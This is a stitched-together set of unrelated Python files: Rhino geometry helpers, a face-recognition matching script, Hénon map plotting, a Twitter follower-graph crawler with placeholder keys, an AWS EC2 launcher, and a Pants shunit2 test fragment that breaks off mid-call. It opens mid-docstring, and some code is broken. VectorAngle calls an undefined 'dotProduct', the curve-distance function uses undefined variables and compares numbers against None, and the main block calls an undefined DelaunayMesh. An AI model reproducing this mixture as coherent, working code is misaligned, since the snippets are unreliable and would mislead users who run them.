pointBetweenPoints(pt1, pt2)
input:
pt1 = rc point
pt2 = rc point
return:
new rc point
"""
x = util.Remap(.5, 0, 1, min(pt1.X, pt2.X), max(pt1.X, pt2.X))
y = util.Remap(.5, 0, 1, min(pt1.Y, pt2.Y), max(pt1.Y, pt2.Y))
z = util.Remap(.5, 0, 1, min(pt1.Z, pt2.Z), max(pt1.Z, pt2.Z))
return rc.Geometry.Point3d(x,y,z)
def PointBetweenPoints(pt1, pt2, t = .5):
"""
pointBetweenPoints(pt1, pt2, t = .5)
input:
pt1 = rc point
pt2 = rc point
t = normalized pt between pt1 and pt2
return:
new rc point
"""
line = rg.Line(pt1, pt2)
return line.PointAt(t)
def RandomPoint(x0 = 0, x1 = 100, y0 = 0, y1 = 100, z0 = 0, z1 = 100):
"""Randomly creates point between x0->x1, y0->y1, and z0->z1domains
"""
return rg.Point3d(random.uniform(x0,x1), random.uniform(y0,y1),random.uniform(z0,z1))
def RemoveDuplicatePts(points):
# Create a dictionary to keep track of the Id
pointDict = {}
ptList = []
for pt in points:
pt3d = rs.coerce3dpoint(pt)
pointDict[pt3d] = pt
ptList.append(pt3d)
#sortList
ptList.sort()
ptLast = ptList[-1]
tol = sc.doc.ModelAbsoluteTolerance
for i in range(len(ptList)-2,-1,-1):
if (abs(ptList[i][0]-ptLast[0]) < tol) and (abs(ptList[i][1]-ptLast[1])) < tol and (abs(ptList[i][2]-ptLast[2]) < tol):
del ptList[i]
else:
ptLast = ptList[i]
#find the the ids with the new list
outputList = []
for pt in ptList:
ptId = pointDict[pt]
outputList.append(ptId)
return outputList
def CentroidOfPoints(pts):
centerPt = rg.Point3d(0,0,0)
for pt in pts:
centerPt += pt
return centerPt/len(pts)
#Vectors
def VectorDisplay(point, vector, accel):
endPt = rc.Geometry.Point3d.Add(point, vector)
accelEndPt = rc.Geometry.Point3d.Add(endPt, accel)
line1 = rc.Geometry.Line(point, endPt)
line2 = rc.Geometry.Line(endPt, accelEndPt)
return sc.doc.Objects.AddLine(line1), sc.doc.Objects.AddLine(line2)
def DotProduct(a, b):
return a.X*b.X + a.Y*b.Y + a.Z*b.Z
def VectorAngle(a, b):
return math.acos(dotProduct(a,b) / (a.Length*b.Length))
def VectorLimit(vector, t):
if vector.Length >= t:
vector.Unitize()
vector *= t
return vector
def RandomVector(size = 1):
"""Random 2d vector
parameters:
size(float)[optional]: length of return vector
returns:
Vector3d
"""
vec = rg.Vector3d(random.uniform(-1, 1), random.uniform(-1, 1), 0)
vec.Unitize()
vec *= size
return vec
def RandomVector3d(amp = None):
"""
returns random unitized vector
if amp: returns vector of length amp
"""
vec = rg.Vector3d(random.uniform(-1,1), random.uniform(-1, 1), random.uniform(-1,1))
vec.Unitize()
if amp:vec *= amp
return vec
def GetCornerVecs(pts, leftHanded = False, amplitude = 1):
"""
Returns the corner vector
parameters:
pts (Point3d)[list]: list of verticies
leftHanded (bool, optional): if True, will get left hand side vecs
amplitude (float, optional): amplitude of the returned vecs
returns:
Vector3d [list]
"""
def GetCornerVec(pt0, pt1, pt2):
ang = util.AngleABC(pt0, pt1, pt2)
vec0 = pt0-pt1
vec1 = pt2-pt1
vec0.Unitize()
vec1.Unitize()
cornerVec = (vec0 + vec1)/2
cornerVec.Unitize()
if ang < 180:
cornerVec.Reverse()
return cornerVec
cornerVecs = []
for i in range(len(pts)):
vec = GetCornerVec(pts[(i-1)%len(pts)], pts[(i)%len(pts)], pts[(i+1)%len(pts)])
vec *= amplitude
if leftHanded:
vec.Reverse()
cornerVecs.append(vec)
return cornerVecs
#Curves
def SplitSelfIntersection(crv, safety = 0):
"""Splits curves into clockwise and counterclockwise loops at self intersection.
parameters:
crv: Closed planar curve
returns:
cw loops [list]
cc loops [list]
"""
safety += 1
cwLoops = []
ccLoops = []
#Reparamterize
newDomain = rg.Interval(0,1)
crv.Domain = newDomain
#Check for self intersection
events = rg.Intersect.Intersection.CurveSelf(crv, sc.doc.ModelAbsoluteTolerance)
#print "{} intersections".format(len(events))
#Collect intersection parameters
parameters = [0]
if len(events) > 0:
for event in events:
parameters.append(event.ParameterA)
parameters.append(event.ParameterB)
else:
if crv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops = [crv]
else:
cwLoops = [crv]
return cwLoops, ccLoops
parameters.append(1)
parameters.sort()
#Split into segments
segments = []
for i in range(len(parameters)-1):
segments.append(crv.Trim(parameters[i], parameters[i+1]))
#If segments are closed themselves, add to loop list
segmentsToRemove = []
for segment in segments:
if segment.IsClosed:
if segment.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops.append(segment)
else:
cwLoops.append(segment)
segmentsToRemove.append(segment)
for segment in segmentsToRemove:
segments.remove(segment)
#Join segments to make new loops
newCrv = rg.PolyCurve()
for segment in segments:
newCrv.Append(segment)
events = rg.Intersect.Intersection.CurveSelf(newCrv, sc.doc.ModelAbsoluteTolerance)
if len(events) > 0 and safety < 10:
#Enter recursion
cwResults, ccResults = SplitSelfIntersection(newCrv, safety)
for result in ccResults:
ccLoops.append(result)
for result in cwResults:
cwLoops.append(result)
else:
if newCrv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops.append(newCrv)
else:
cwLoops.append(newCrv)
return cwLoops, ccLoops
def CustomOffset(crv, iter_d, rd):
"""
parameters:
crv: Rhino curve
inter_d (float): offset distance
rd: rebuild distance
returns:
crv [list]: curves in same orientation as input crv
"""
n = int(crv.GetLength() / rd)
if n < 3:
n = 3
crv = crv.Rebuild(n, 3, True)
params = crv.DivideByCount(n, False)
newPts = []
for param in params:
pt = crv.PointAt(param)
tan = crv.TangentAt(param)
tan.Rotate(math.radians(90), rg.Vector3d(0,0,1))
tan.Unitize()
tan *= iter_d
newPt = rg.Point3d.Add(pt, tan)
newPts.append(newPt)
newCrv = rg.NurbsCurve.Create(True, 3, newPts)
cwCrvs, ccCrvs = SplitSelfIntersection(newCrv)
if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise:
return cwCrvs
else:
return ccCrvs
#Geometry
def Cone(pt, vec, range, radius):
"""arcPtVecInt(pt, vec, range)
input:
pt: center point of arc
vec:(vector) direction of arc
range:(float in degrees) Vision cone, aligned to vector
radius: (float) radius
return:
rc arc
"""
perpVec = rc.Geometry.Vector3d(-vec.Y, vec.X, 0)
plane = rc.Geometry.Plane(pt, vec, perpVec)
plane.Rotate(math.pi, plane.Normal)
circle = rc.Geometry.Circle(plane, radius)
interval = rc.Geometry.Interval(math.pi+math.radians(range/2), math.pi-math.radians(range/2))
arc = rc.Geometry.Arc(circle, interval)
line1 = rc.Geometry.LineCurve(pt, arc.StartPoint)
line2 = rc.Geometry.LineCurve(arc.EndPoint, pt)
polycurve = rc.Geometry.PolyCurve()
polycurve.Append(arc)
polycurve.Append(line2)
polycurve.Append(line1)
return polycurve
def LineCurveLineCurveDistance(line1, line2):
"""
paremeters:
crv1 (LineCurve):
crv2 (LineCurve):
returns:
float: distance between two curves
LineCurve: line between two closestPoints (if curves touching, returns True)
"""
result = rg.Intersect.Intersection.CurveCurve(crv1, crv2, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance)
if result.Count > 0:
d = 0
line = result[0]
else:
crv1Pts = [crv1.PointAtStart, crv1.PointAtEnd]
crv2Pts = [crv2.PointAtStart, crv2.PointAtEnd]
closestDist = None
closestCrv1Pt = None
closestCrv2Pt = None
for crv1Pt in crv1Pts:
closestParamOnCrv2 = crv2.ClosestPoint(crv1Pt, 0)
closestPtOnCrv2 = crv2.PointAt(closestParamOnCrv2[1])
dist = rs.Distance(crv1Pt, closestPtOnCrv2)
if dist < closestDist or closestDist is None:
closestDist = dist
closestCrv1Pt = crv1Pt
closestCrv2Pt = closestPtOnCrv2
for crv2Pt in crv2Pts:
closestParamOnCrv1 = crv1.ClosestPoint(crv2Pt, 0)
closestPtOnCrv1 = crv1.PointAt(closestParamOnCrv1[1])
dist = rs.Distance(crv2Pt, closestPtOnCrv1)
if dist < closestDist or closestDist is None:
closestDist = dist
closestCrv1Pt = closestPtOnCrv1
closestCrv2Pt = crv2Pt
d = closestDist
line = rg.LineCurve(closestCrv1Pt, closestCrv2Pt)
return d, line
def IsCurveInsideCurve(plineCrv, testCrv):
"""IsCurveInsideCurve(plineCrv, testCrv)
parameters:
plineCrv (curve): closed polylineCurve
testCrv (curve): curve to test if inside plineCrv
returns:
0 - Outside
1 - Intersecting
2 - Inside
"""
result = rg.Intersect.Intersection.CurveCurve(plineCrv, testCrv, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance)
if len(result)>0:
return 1
if plineCrv.Contains(testCrv.PointAtStart) == rg.PointContainment.Inside or plineCrv.Contains(testCrv.PointAtEnd) == rg.PointContainment.Inside:
return 2
return 0
def main():
obj = rs.GetObject("Select Objects", preselect = True)
obj = rs.coercecurve(obj)
cw, cc = SplitSelfIntersection(obj)
#bbox = minBoundingBox(obj)
for crv in cw:
sc.doc.Objects.AddCurve(crv)
for crv in cc:
sc.doc.Objects.AddCurve(crv)
#Classes
class Particle():
def __init__(self, pos = rg.Point3d(0,0,0), vel = rg.Vector3d(0,0,0)):
self.pos = pos
self.vel = vel
self.acc = rg.Vector3d(0,0,0)
self.id = None
self.radius = 0
def Update(self):
futurePos = rg.Point3d.Add(self.pos, self.vel)
if futurePos.X < self.radius:
self.vel.X *= -1
if futurePos.Y < self.radius:
self.vel.Y *= -1
if futurePos.Z < self.radius:
self.vel.Z *= -1
if futurePos.X > 100-self.radius:
self.vel.X *= -1
if futurePos.Y > 100-self.radius:
self.vel.Y *= -1
if futurePos.Z > 100-self.radius:
self.vel.Z *= -1
self.vel += self.acc
self.pos += self.vel
def UpdateDisplay(self):
if self.id:sc.doc.Objects.Delete(self.id, True)
self.id = sc.doc.Objects.AddPoint(self.pos)
if __name__ == "__main__":
pts = []
for i in range(10):
pts.append(RandomPoint())
mesh = DelaunayMesh(pts, rg.Plane.WorldXY)
sc.doc.Objects.AddMesh(mesh)
|
from genericpath import exists
from operator import mod
import pickle
from typing import List
import colorama
import face_recognition
import os
import cv2
from face_recognition.api import face_encodings, face_locations
import json
from picture import Picture
from time import clock
from colorama import Fore, Back, Style
colorama.init(autoreset=True)
KNOWN_FACES_DIR = "../known-images"
LOADED_FACES_FILE = f"../loaded-faces.pickle"
FACE_TO_MATCH = "../unknown-images/to_match.jpg"
TOLERANCE = 0.6
FRAME_THICKNESS = 3
FONT_THICKNESS = 2
MODEL = "hog" # Could also be cnn
def load_pictures_objects(pictures_path: str):
pictures = []
for name in os.listdir(pictures_path):
for filename in os.listdir(f"{pictures_path}/{name}"):
relative_path = f'{pictures_path}/{name}/{filename}'
print(f'loading {relative_path}')
image = face_recognition.load_image_file(relative_path)
locations = face_recognition.face_locations(image, model=MODEL)
encodings = face_recognition.face_encodings(image, locations)
pictures.append(Picture(relative_path, encodings, locations))
return pictures
def serialize_pictures(pictures: List[Picture], fileToCreate: str):
with open(fileToCreate, 'wb') as file:
pickle.dump(pictures, file, protocol=pickle.HIGHEST_PROTOCOL)
def deserialize_pictures(fileToRead):
with open(fileToRead, "rb") as file:
pictures = pickle.load(file)
return pictures
pictures = []
if exists(LOADED_FACES_FILE):
print("Loading stored images...")
pictures = deserialize_pictures(LOADED_FACES_FILE)
else:
print("Storing all images...")
pictures = load_pictures_objects(KNOWN_FACES_DIR)
serialize_pictures(pictures, LOADED_FACES_FILE)
#known_locations = []
known_faces = []
known_names = []
for i in pictures:
known_faces.append(i.encodings)
known_names.append(i.name)
print('done!')
print("processing unknown face")
#for filename in os.listdir(UNKNOWN_FACES_DIR):
#print(filename)
image = face_recognition.load_image_file(FACE_TO_MATCH)
#locations = face_recognition.face_locations(image, model=MODEL)
encoding = face_recognition.face_encodings(image)[0]
for index, i in enumerate(pictures):
#print(f"{index + 1}- comparing {FACE_TO_MATCH} with face(encoding) of {i.name}")
#print(f"{i.name} has {len(i.encodings)} face(s)(encoding)")
if len(i.encodings) == 0:
print(f"Picture not found in {i.name}!")
else:
results = face_recognition.compare_faces(i.encodings, encoding, tolerance=TOLERANCE)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if True in results:
#print(f"{i.name} has {len(i.encodings)} face(s)(encoding)")
print(Fore.GREEN + f'{i.name} MATCH')
#else:
#print(Fore.RED + 'NOT A MATCH')
#print('------------------------------------------')
#print()
#for face_encoding, face_location, in zip(encodings, locations):
# results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)
# print()
# match = None
# if True in results:
# match = known_names[results.index(True)]
# print(f"Match found: {match}")
# top_left = (face_location[3], face_location[0])
# bottom_right = (face_location[1], face_location[2])
# color = [200, 162, 47]
# cv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)
# top_left = (face_location[3], face_location[2])
# bottom_right = (face_location[1], face_location[2] + 22)
# cv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)
# cv2.putText(image, match, (face_location[3]+10, face_location[2]+15), cv2.FONT_HERSHEY_COMPLEX, 0.5, (200,200,200), FONT_THICKNESS)
#cv2.imshow(filename, image)
#cv2.waitKey(200000)
#cv2.destroyWindow(filename)
|
import numpy as np
from matplotlib.pyplot import figure, cm, show
import full_henon as fh
import helper as he
def basin_attr(xVals, yVals, xSize, ySize, its=100, a=1.4, b=0.3):
""" Function that creates the basin of attraction """
# Creating x and y starting values
xRange = np.linspace(xVals[0], xVals[1], xSize)
yRange = np.linspace(yVals[1], yVals[0], ySize)
grid = np.zeros((ySize, xSize)) # Grid
# Looping over all staring values
for xInd, x0 in enumerate(xRange):
for yInd, y0 in enumerate(yRange):
xv, yv = fh.Henon(x0, y0, its, a, b, div=True, threshold=1e2)
if xv != None: grid[yInd][xInd] += 1
return grid
def plot_basin(saveFig=None):
""" Function that plots the basin of attraction. """
# Values for creating the grid and plot
xVals = (-2, 2) # Range of x values
yVals = (-3, 5) # Range of y values
xSize = 2048 # Number of x pixels
ySize = 1080 # Number of y pixels
numb = 5 # Number of x and y ticks for the plot
# Axes labels and ticks
xLabels = np.linspace(xVals[0], xVals[1], numb).astype(int)
yLabels = np.linspace(yVals[0], yVals[1], numb).astype(int)
xLocs = np.linspace(0, xSize, numb)
yLocs = np.linspace(ySize, 0, numb)
# Finding the trapping region
trappingRegion = basin_attr(xVals, yVals, xSize, ySize, its=25)
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame.imshow(trappingRegion, cmap=cm.binary)
# Axes labeling and ticks
frame.set_xlabel(r"$x_0$", fontsize=20)
frame.set_ylabel(r"$y_0$", fontsize=20)
frame.set_xticks(xLocs)
frame.set_yticks(yLocs)
frame.set_xticklabels(xLabels, fontsize=15)
frame.set_yticklabels(yLabels, fontsize=15)
if saveFig != None: fig.savefig(saveFig)
else: show()
def trapp_region(saveFig=None, output=False):
""" Function that plots the trapping region of the Hénon map """
# Vertices (see Peitgens et al.)
P1 = (-1.33, 0.42)
P2 = (1.32, 0.133)
P3 = (1.245, -0.14)
P4 = (-1.06, -0.5)
# Creating the lines
Vert1 = he.Create_Line(P1, P2)
Vert2 = he.Create_Line(P2, P3)
Vert3 = he.Create_Line(P3, P4)
Vert4 = he.Create_Line(P4, P1)
# Combining the points and vertices in lists
ps = [P1, P2, P3, P4]
vs = [Vert1, Vert2, Vert3, Vert4]
if output: return ps, vs
# Generating points of the Hénon map
xv, yv = fh.Henon(0, 0, int(1e4), 1.4, 0.3)
# Plotting
fig = figure(figsize=(10,8))
frame = fig.add_subplot(1,1,1)
frame.scatter(xv, yv, s=0.01, label='points', color='darkblue', marker='.')
for i in range(len(ps)):
frame.scatter(ps[i][0], ps[i][1], color='crimson', marker='o', s=50)
frame.plot(vs[i][0], vs[i][1], color='seagreen', linestyle='--', lw=1.8)
frame.set_xlabel("x", fontsize=20)
frame.set_ylabel("y", fontsize=20)
frame.grid()
if saveFig != None: fig.savefig(saveFig)
else: show()
def plot_n_img(n_start=0, n_end=8, output=False, plot=True, saveFig=None,
color=['indigo'], lw=[1], av1=1.4, bv1=0.3):
""" Function that creates the image of a geometrical shape using the Hénon
map. The initial vertices of the geometric shape are given by the input
parameter 'init_vert'. This function is able to generate multiple images
based on the initial input. This implies that the Hénon map will be
applied multiple times to the initial conditions based on the input.
'n_start' gives the lowest order image. So n_start=0 is the image
obtained after the map has acted on it once; 'n_end' gives the highest
order image. It is possible to select which output is desirable, either
a list containing all images or a plot showing the images or both.
Input: n_start = lowest order image (integer);
n_end = highest order image (integer);
output = whether or not the boundaries in a list are the
output (Boolean);
plot = whether or not a plot has to be made (Boolean);
saveFig = if the figure has to be saved (None or string);
color = color of the images (list);
lw = line widths of the different images (list);
av1 = a parameter of the Hénon map (float);
bv1 = b parameter of the Hénon map (float);
Returns: optional: all_bounds = list containing the images (list).
"""
# Starting values
j = 0
points, vert = trapp_region(output=True)
count = 0
# Empty list to put the boundaries in
if output: all_bounds = []
# Initializing the plot
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
for ind, v in enumerate(vert):
frame.scatter(points[ind][0], points[ind][1], color='crimson',
marker='o', s=65, zorder=3)
frame.plot(v[0], v[1], color='seagreen', linestyle='--', lw=2)
# Looping
while j <= n_end:
bounds = he.image_func(vert, av1, bv1)
# Checking if the values need to be added to the boundaries
if j >= n_start and j <= n_end:
if output: all_bounds.append(bounds)
for ind, b in enumerate(bounds):
if ind == 0:
frame.plot(b[0], b[1], label=f"Image {j+1}", zorder=3-j/10,
color=color[count], lw=lw[count])
else:
frame.plot(b[0], b[1], color=color[count], lw=lw[count])
count += 1
# New conditions for the next loop
vert = bounds
j += 1
# Finishing the plot
frame.set_xlabel(r"$x$", fontsize=20)
frame.set_ylabel(r"$y$", fontsize=20)
frame.tick_params(axis="both", labelsize=15)
frame.legend(fontsize=20)
frame.grid()
if saveFig != None: fig.savefig(str(saveFig))
elif plot: show()
elif output: return all_bounds
|
import twitter
import sys
import json
import time
import networkx
import operator
import pickle
from pathlib import Path
import matplotlib.pyplot as plt
def oauth_login():
# XXX: Go to http://twitter.com/apps/new to create an app and get values
# for these credentials that you'll need to provide in place of these
# empty string values that are defined as placeholders.
# See https://dev.twitter.com/docs/auth/oauth for more information
# on Twitter's OAuth implementation.
CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX'
OAUTH_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXX'
OAUTH_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET, CONSUMER_KEY, CONSUMER_SECRET)
twitter_api = twitter.Twitter(auth=auth)
return twitter_api
twitter_api = oauth_login()
def parsedUserShow(ID):
parsedUserShowDB = {}
my_file = Path("parsedUserShowDB.txt")
if my_file.is_file():
with open("parsedUserShowDB.txt", "rb") as f:
try:
parsedUserShowDB = pickle.load(f)
except EOFError:
print("EOF Error, initializing empty DB")
if ID in parsedUserShowDB:
return parsedUserShowDB[ID]
else: #Should always be true when user not yet in DB
UserResponseShow = twitter_api.users.show(user_id = ID)
UserDumps = json.dumps(UserResponseShow, indent=1)
UserResponseParsed = json.loads(UserDumps) #This is the User Data Dictionary
parsedUserShowDB[ID] = UserResponseParsed
with open("parsedUserShowDB.txt", "wb") as f:
pickle.dump(parsedUserShowDB, f)
return UserResponseParsed # type dict
#End of parsedUserShow
def top5(reciprocals_dict):
top5Dict = {}
#If there are 5 or less reciprocals the top 5 will be all of the reciprocals
if(len(reciprocals_dict) <= 5 ):
top5Dict = reciprocals_dict
else:
#figure out which of the 5 reciprocals have the most followers
reciprocalsSorted = ( sorted( reciprocals_dict.items(), key=operator.itemgetter(1) ) ) # List of tuples sorted by follower count
reciprocalsSorted.reverse() # We get the list sorted in ascending order but want it in descending so we can chose the first 5
#First 5 pairs will be the top 5
for i in range(5):
id = reciprocalsSorted[i][0]
followerCount = reciprocalsSorted[i][1]
top5Dict.update({id : followerCount})
return top5Dict
def dictionaryOfReciprocals(reciprocals_set):
reciprocalsDict = {}
for i in reciprocals_set:
reciprocalData = parsedUserShow(i)
reciprocalID = reciprocalData['id']
reciprocalFollowersCount = reciprocalData['followers_count']
reciprocalPair = {reciprocalID : reciprocalFollowersCount}
reciprocalsDict.update(reciprocalPair)
return reciprocalsDict
class socialNode():
#Instance variables
#twitter_id = 0
#twitter_handle = "NONE"
#number_of_followers = 0
#list_of_friends = [] Will be list of all friends as returned from Twitter API
#dict_of_reciprocals = () dictionary of reciprocals
#top_5 = {} # Will be a dictonary of the 5 reciprocals with most followers, 'id': number_of_followers
def __init__(self, *args, twitter_id = 0, twitter_handle = "NONE"):
my_file = Path("SocialNodesDB.txt")
if my_file.is_file():
with open("SocialNodesDB.txt", "rb") as f:
try:
SocialNodesDB = pickle.load(f)
except EOFError:
print("EOF Error, initializing empty DB")
SocialNodesDB = {}
else:
with open("SocialNodesDB.txt", "wb") as f:
SocialNodesDB = {}
pickle.dump(SocialNodesDB, f)
if(twitter_id in SocialNodesDB):# In case we have seen this user node before and have it cached
socialNodeDict = SocialNodesDB[twitter_id]
#print(SocialNodesDB)
UserResponseParsed = socialNodeDict["UserResponseParsed"]
#Instantiates class variables on user data
#TO-DO IMPLEMENT CACHE TO CACHE ALL THIS DATA
self.twitter_id = UserResponseParsed['id'] #int
self.twitter_handle = UserResponseParsed['screen_name'] # string
self.number_of_followers = UserResponseParsed['followers_count'] # int
self.list_of_followers = socialNodeDict["list_of_followers"] # list
self.list_of_friends = socialNodeDict["list_of_friends"]
self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals
self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount }
#socialNodeInfo = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers,
# "list_of_friends" : self.list_of_friends}
else: # In case the user is new
UserResponseParsed = parsedUserShow(twitter_id)
#Instantiates class variables on user data
self.twitter_id = UserResponseParsed['id'] #int
self.twitter_handle = UserResponseParsed['screen_name'] # string
self.number_of_followers = UserResponseParsed['followers_count'] # int
self.list_of_followers = json.loads( json.dumps( twitter_api.followers.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list
self.list_of_friends = json.loads( json.dumps(twitter_api.friends.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list
self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals
self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount }
socialNodeDict = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers,
"list_of_friends" : self.list_of_friends}
SocialNodesDB[self.twitter_id] = socialNodeDict
with open("SocialNodesDB.txt", "wb") as f:
pickle.dump(SocialNodesDB, f)
#End of Init
#This will return a graph with our node in the middle and edges to the top 5
def top5Graph(originalNode):
top5Dict = originalNode.top5
top5Graph = networkx.Graph()
originalNodeID = originalNode.twitter_id
top5Graph.add_node(originalNodeID)
for ID in top5Dict:
top5Graph.add_node(ID)
top5Graph.add_edge(originalNodeID, ID)
return top5Graph
#This class is made to handle the Graph portion so it should not call the twitter API
class socialNetwork():
#networkGraph = networkx.Graph()
#initialNode = socialNode()
def __init__(self, initialNode):
#Instantiates initialNode
self.initialNode = initialNode
self.initialNodeID = initialNode.twitter_id
self.visited = [] # This is not the id's of nodes in the graph, its the ID's of the nodes that we have already fetched the Top 5 for
#Creates graph
self.networkGraph = networkx.Graph()
#Utilizing gpickle to save time in future runs
self.gpickleFileName = str(self.initialNodeID) + ".gpickle"
if(Path(self.gpickleFileName).is_file()):
self.networkGraph = networkx.read_gpickle(self.gpickleFileName)
print("Loaded pickle graph save with " + str(self.networkGraph.number_of_nodes())+ " nodes")
#Saving visited
try:
with open((str(self.initialNodeID) + '.txt'), 'rb') as f:
self.visited = pickle.load(f)
except:
with open((str(self.initialNodeID) + '.txt'), 'wb') as f:
pickle.dump(self.visited, f)
print("Loaded pickle visited list with " + str(len(self.visited)) + " visited nodes")
else: # Adds initial node to graph
self.networkGraph.add_node(self.initialNodeID)
def returnDiameter(self):
return networkx.diameter(self.networkGraph)
def returnAverageDistance(self):
return networkx.average_shortest_path_length(self.networkGraph)
# size and node must be passed as parameters
# this is the crawler
def expandNetwork(self, **kwargs):
#Here is where we populate the graph with the top 5 of the top 5 until we reach around the size we want
bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID)
bfs_edges_list = list(bfs_edges)
print(bfs_edges_list)
#Terminating recursion case, since our graph size is constant in all iterations we are checking
# the correct size, we'll endup with around 25 more nodes than askes
while(self.networkGraph.number_of_nodes() < kwargs['size']):
if((len(self.visited) > 0 and bfs_edges == 0)):
print("Problem")
break
selectedNode = self.initialNode
selectedNodeID = selectedNode.twitter_id
#Determine next node via BFS
bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID)
bfs_edges_list = list(bfs_edges)
if(int(self.networkGraph.number_of_nodes()) != 0): #Always true except for first node
for edge in bfs_edges_list:
#if node not in graph, that is selected node
endingNodeID = edge[1]
if(endingNodeID not in self.visited):
try:
selectedNode = socialNode(twitter_id = endingNodeID)
selectedNodeID = selectedNode.twitter_id
except: #This is normally triggered when the user has their profile set to private "not authorized" error
print("Could not use node " + str(endingNodeID) + " probably has profile set to private")
selectedNodeID = endingNodeID
break
#To prevent double entries
if(selectedNodeID not in self.visited):
self.visited.append(selectedNodeID)
#Get a graph from selected node, initially our first node, max of 5 nodes
selectedTop5Graph = top5Graph(selectedNode)
# Add top 5 graph of selected node to our graph
self.networkGraph = networkx.compose(self.networkGraph, selectedTop5Graph)
print(selectedNodeID)
print(self.networkGraph.number_of_nodes())
#Writes to pickle to save time in future runs
networkx.write_gpickle(self.networkGraph, self.gpickleFileName)
with open((str(self.initialNodeID) + '.txt'), 'wb') as f:
pickle.dump(self.visited, f)
time.sleep(2)
#end of while loop
#self.expandNetwork(size = kwargs['size'])
#end of expandNetwork
#THIS SHOULD NOT BE RECURSION
def networkDraw(self):
networkx.draw(self.networkGraph, with_labels=True, font_weight="bold")
plt.show()
if __name__ == '__main__':
print('THIS SHOULD NOT BE MAIN AND DOES NOTHING, ITS A MODULE TO IMPORT TO MAIN MODULE')
|
import time
import boto3
from collections import defaultdict
region = 'us-east-1'
ami = 'ami-0fe23c115c3ba9bac'
# region = 'us-west-2'
# ami = 'ami-01bbe152bf19d0289'
ec2 = boto3.resource('ec2', region_name=region)
instance = ec2.create_instances(
ImageId=ami,
IamInstanceProfile={
'Name': 'sandbox-ec2-assume-role',
},
MinCount=1,
MaxCount=1,
SecurityGroupIds=['sg-065521436b78e83ba'],
KeyName='sandbox',
InstanceType='t2.micro'
)
time.sleep(5)
# Get information for all running instances
instance_status = ec2.instances.filter(Filters=[{
'Name': 'instance-state-name',
'Values': ['pending']}])
ec2info = defaultdict()
for instance in instance_status:
ec2info[instance.id] = {
'Type': instance.instance_type,
'ID': instance.id,
'Private IP': instance.private_ip_address,
'Public IP': instance.public_ip_address,
'State': instance.state['Name'],
}
attributes = ['Type', 'ID', 'Private IP', 'Public IP', 'State']
for instance_id, instance in ec2info.items():
for key in attributes:
print("{0}: {1}".format(key, instance[key]))
print("-------------------------")
|
print("Criando um novo arquivo pelo GitHub e usando o git pull para puxar")
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.target_types import PexBinary, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_type_rules
from pants.backend.python.util_rules import pex_from_targets
from pants.backend.shell import shunit2_test_runner
from pants.backend.shell.shunit2_test_runner import (
Shunit2FieldSet,
Shunit2Runner,
Shunit2RunnerRequest,
Shunit2TestRequest,
)
from pants.backend.shell.target_types import (
ShellSourceTarget,
Shunit2Shell,
Shunit2ShellField,
Shunit2TestsGeneratorTarget,
)
from pants.backend.shell.target_types import rules as target_types_rules
from pants.core.goals.test import (
TestDebugRequest,
TestResult,
build_runtime_package_dependencies,
get_filtered_environment,
)
from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.fs import FileContent
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.target import Target
from pants.testutil.python_rule_runner import PythonRuleRunner
from pants.testutil.rule_runner import QueryRule, mock_console
@pytest.fixture
def rule_runner() -> PythonRuleRunner:
return PythonRuleRunner(
rules=[
*shunit2_test_runner.rules(),
*source_files.rules(),
*pex_from_targets.rules(),
*package_pex_binary.rules(),
*python_target_type_rules(),
*target_types_rules(),
build_runtime_package_dependencies,
get_filtered_environment,
QueryRule(TestResult, [Shunit2TestRequest.Batch]),
QueryRule(TestDebugRequest, [Shunit2TestRequest.Batch]),
QueryRule(Shunit2Runner, [Shunit2RunnerRequest]),
],
target_types=[
ShellSourceTarget,
Shunit2TestsGeneratorTarget,
PythonSourcesGeneratorTarget,
PexBinary,
],
)
GOOD_TEST = dedent(
"""\
#!/usr/bin/bash
testEquality() {
assertEquals 1 1
}
"""
)
def run_shunit2(
rule_runner: PythonRuleRunner,
test_target: Target,
*,
extra_args: list[str] | None = None,
env: dict[str, str] | None = None,
) -> TestResult:
rule_runner.set_options(
[
"--backend-packages=pants.backend.shell",
*(extra_args or ()),
],
env=env,
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
input: Shunit2TestRequest.Batch = Shunit2TestRequest.Batch(
